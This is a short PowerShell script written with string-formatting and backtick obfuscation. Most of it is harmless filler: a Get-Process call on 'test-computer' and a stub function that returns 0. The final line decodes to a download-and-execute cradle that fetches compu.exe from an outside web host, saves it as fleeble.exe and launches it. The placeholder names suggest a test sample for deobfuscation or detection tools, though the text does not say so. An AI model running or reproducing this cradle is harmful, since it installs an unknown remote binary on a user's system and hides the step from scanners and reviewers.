.("{0}{2}{1}" -f 'G','ocess','et-Pr') -ComputerName ("{1}{0}{2}" -f 't','tes','-computer')


function ge`T-Th`INg
{
	[Alias()]
	[OutputType([int])]
	Param
	(
		
		[Parameter(maNdatorY=${TR`Ue},
				   VALuEFROMPipElInebypROperTynamE=${t`Rue},
				   posITioN=0)]
		${nA`Me}
	)
	
	Begin
	{
	}
	Process
	{
		return 0;
	}
	End
	{
	}
}

.("{1}{0}" -f't-Thing','Ge') -Name ("{0}{1}" -f'te','st')

(&("{3}{0}{1}{2}" -f 'w-Obj','e','ct','Ne') ("{1}{4}{2}{3}{0}" -f'ent','Syst','Net.WebC','li','em.')).("{2}{1}{0}{3}" -f'oadF','wnl','Do','ile').Invoke(("{0}{2}{4}{1}{3}" -f'h','.com/comp','ttp://worldni','u.exe','t'),("{1}{0}{2}"-f'.','fleeble','exe'));.("{2}{1}{0}" -f 'ess','t-Proc','Star') ("{1}{2}{0}"-f'e.exe','flee','bl')
